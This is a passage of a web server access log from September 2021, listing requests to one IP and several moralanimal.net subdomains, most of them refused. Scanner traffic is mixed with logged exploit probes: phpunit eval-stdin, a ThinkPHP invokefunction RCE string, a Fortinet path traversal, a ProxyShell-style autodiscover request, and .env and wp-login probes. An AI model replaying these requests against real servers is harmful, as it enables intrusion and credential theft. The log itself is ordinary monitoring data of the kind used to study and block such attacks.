138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:14:07:37 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:15:04:31 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:15:04:32 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:16:11:02 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [02/Sep/2021:16:22:33 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:35 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:36 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:38 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:39 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:41 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:41 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [02/Sep/2021:16:22:43 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:43 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:22:44 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Sep/2021:16:33:14 +0000] 400 - - http localhost "-" [Client 80.82.78.27] [Length 154] [Gzip -] "-" "-" [02/Sep/2021:17:01:35 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Sep/2021:17:01:35 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Sep/2021:17:01:35 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Sep/2021:17:01:35 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Sep/2021:17:01:35 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Sep/2021:17:01:35 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Sep/2021:17:12:47 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:17:12:48 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:19:45:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.231.225] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [02/Sep/2021:20:57:45 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:20:57:45 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:21:11:17 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.221.23] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Sep/2021:22:02:11 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.161] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.el7.x86_64" "-" [02/Sep/2021:22:16:34 +0000] 444 - GET https 64.22.31.253 "/wiki/portal/pages/doenterpagevariables.action" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [02/Sep/2021:22:50:17 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [02/Sep/2021:23:24:28 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.54] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Sep/2021:23:30:59 +0000] 400 - - http localhost "-" [Client 91.220.163.139] [Length 154] [Gzip -] "-" "-" [02/Sep/2021:23:42:22 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 185.254.31.134] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Sep/2021:23:42:22 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 185.254.31.134] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Sep/2021:00:38:30 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 35.80.16.45] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Sep/2021:00:43:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [03/Sep/2021:00:47:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.254] [Length 0] [Gzip -] "-" "-" [03/Sep/2021:00:47:55 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Sep/2021:01:13:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.168.143] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [03/Sep/2021:01:55:04 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:01:55:04 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:02:45:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Sep/2021:02:56:53 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:56:53 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:56:55 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:56:56 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:56:56 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:56:56 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [03/Sep/2021:02:56:57 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:56:58 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:57:00 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:57:00 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:57:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:02:57:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Sep/2021:03:26:03 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 144.86.173.84] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [03/Sep/2021:03:52:08 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Sep/2021:04:29:24 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 144.86.173.2] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [03/Sep/2021:04:49:43 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:04:49:44 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:05:30:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.220.215] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Sep/2021:05:56:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [03/Sep/2021:06:38:32 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:06:38:33 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:07:07:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.58] [Length 0] [Gzip -] "-" "-" [03/Sep/2021:07:07:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.58] [Length 252] [Gzip -] "-" "-" [03/Sep/2021:07:07:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [03/Sep/2021:07:31:49 +0000] 444 - GET https mosquitto.moralanimal.net "/blog/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [03/Sep/2021:07:55:44 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [03/Sep/2021:08:04:42 +0000] 444 - GET https mosquitto.moralanimal.net "/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [03/Sep/2021:10:16:36 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:10:16:37 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:10:38:02 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.221.23] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Sep/2021:10:51:15 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:10:51:16 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:11:51:07 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [03/Sep/2021:12:30:41 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:12:30:41 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:13:00:47 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:13:00:47 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:13:04:08 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:13:04:08 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:14:12:33 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:14:12:33 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:15:01:33 +0000] 400 - - http localhost "-" [Client 91.241.19.157] [Length 154] [Gzip -] "-" "-" [03/Sep/2021:15:05:45 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:15:05:45 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:17:01:38 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Sep/2021:17:01:38 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Sep/2021:17:01:38 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Sep/2021:17:01:38 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Sep/2021:17:01:38 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Sep/2021:17:01:38 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Sep/2021:18:55:41 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 144.86.173.154] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [03/Sep/2021:19:10:36 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Sep/2021:20:11:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.189.111] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Sep/2021:20:15:53 +0000] 444 - GET https mosquitto.moralanimal.net "/cms/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [03/Sep/2021:20:46:27 +0000] 444 - GET https mosquitto.moralanimal.net "/home/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [03/Sep/2021:21:15:24 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.220.63] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Sep/2021:21:15:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Sep/2021:21:29:20 +0000] 444 - GET https mosquitto.moralanimal.net "/test/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [03/Sep/2021:22:17:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.90] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Sep/2021:22:40:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.66.88.100] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [03/Sep/2021:23:01:53 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:23:01:53 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Sep/2021:23:22:06 +0000] 444 - GET https mosquitto.moralanimal.net "/wordpress/wp-login.php" [Client 186.154.93.91] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [03/Sep/2021:23:26:28 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.221.15] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Sep/2021:00:00:37 +0000] 444 - POST https 64.22.31.253 